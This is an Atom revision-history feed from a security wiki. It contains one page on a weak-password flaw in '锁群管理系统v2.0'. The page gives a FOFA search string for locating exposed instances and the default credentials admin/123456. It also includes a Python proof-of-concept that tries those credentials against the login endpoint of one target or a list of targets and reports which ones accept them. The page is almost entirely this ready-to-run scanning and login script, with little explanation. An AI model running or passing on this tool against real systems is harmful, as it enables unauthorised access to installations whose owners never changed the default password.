<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E</id>
	<title>鎖群管理系統v2.0 弱口令漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T19:52:06Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E&amp;diff=3286&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==FOFA== &lt;pre&gt; title=&quot;锁群管理系统v2.0&quot; &lt;/pre&gt;  ==默認憑據== 用戶名：admin 密碼：123456  ==POC== &lt;pre&gt; import requests import sys import argparse from request...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E&amp;diff=3286&amp;oldid=prev"/>
		<updated>2021-05-26T05:04:29Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==FOFA== &amp;lt;pre&amp;gt; title=&amp;quot;锁群管理系统v2.0&amp;quot; &amp;lt;/pre&amp;gt;  ==默認憑據== 用戶名：admin 密碼：123456  ==POC== &amp;lt;pre&amp;gt; import requests import sys import argparse from request...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
title=&amp;quot;锁群管理系统v2.0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==默認憑據==&lt;br /&gt;
用戶名：admin&lt;br /&gt;
密碼：123456&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import argparse&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告&lt;br /&gt;
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告&lt;br /&gt;
&lt;br /&gt;
def lemonlove7():&lt;br /&gt;
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')&lt;br /&gt;
    print('python xxx.py -f/--file x.txt')&lt;br /&gt;
    print('FOFA:title=&amp;quot;锁群管理系统v2.0&amp;quot;')&lt;br /&gt;
    print('lemonlove7')&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv)==1:&lt;br /&gt;
    lemonlove7()&lt;br /&gt;
    sys.exit()&lt;br /&gt;
p = argparse.ArgumentParser(description='lemonlove7')&lt;br /&gt;
p.add_argument('-u','--url',help='输入url',default='')&lt;br /&gt;
p.add_argument('-f','--file',help='输入文件',default='')&lt;br /&gt;
a = p.parse_args()&lt;br /&gt;
&lt;br /&gt;
url = a.url&lt;br /&gt;
&lt;br /&gt;
file = a.file&lt;br /&gt;
&lt;br /&gt;
headers= {&lt;br /&gt;
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',&lt;br /&gt;
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',&lt;br /&gt;
    'Cookie':'ASP.NET_SessionId=pjb41rehvxilis32hfgus0r5'&lt;br /&gt;
}&lt;br /&gt;
if url != '':&lt;br /&gt;
    furl = url&lt;br /&gt;
    try:&lt;br /&gt;
        url =furl+'/inc/CheckLogin.aspx?checkLogin=login&amp;amp;un=admin&amp;amp;pw=123456'&lt;br /&gt;
        r= requests.get(url=url,headers=headers,timeout=10,verify=False)&lt;br /&gt;
        if r.status_code == 200 and '0' in r.text:&lt;br /&gt;
            print(furl+'存在弱口令')&lt;br /&gt;
        else:&lt;br /&gt;
            print(furl+'不存在弱口令')&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(furl+'不存在弱口令')&lt;br /&gt;
&lt;br /&gt;
if file !='':&lt;br /&gt;
    text =file&lt;br /&gt;
    f = open(text,'r+')&lt;br /&gt;
    for i in f.readlines():&lt;br /&gt;
        url = i.strip()&lt;br /&gt;
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:&lt;br /&gt;
            url = 'http://' + url&lt;br /&gt;
        url1 = url&lt;br /&gt;
        url2=url&lt;br /&gt;
        try:&lt;br /&gt;
            url1 = url+'/inc/CheckLogin.aspx?checkLogin=login&amp;amp;un=admin&amp;amp;pw=123456'&lt;br /&gt;
            r =requests.post(url=url1,headers=headers,timeout = 10,verify=False)&lt;br /&gt;
            if r.status_code==200 and '0' in r.text:&lt;br /&gt;
                print(url2+'存在弱口令')&lt;br /&gt;
            else:&lt;br /&gt;
                print(url2+'不存在弱口令')&lt;br /&gt;
        except Exception as e:&lt;br /&gt;
            print(url2+'不存在弱口令')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
https://mp.weixin.qq.com/s/Xu0_SCMwhCR9Bx7mo8v1kw&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>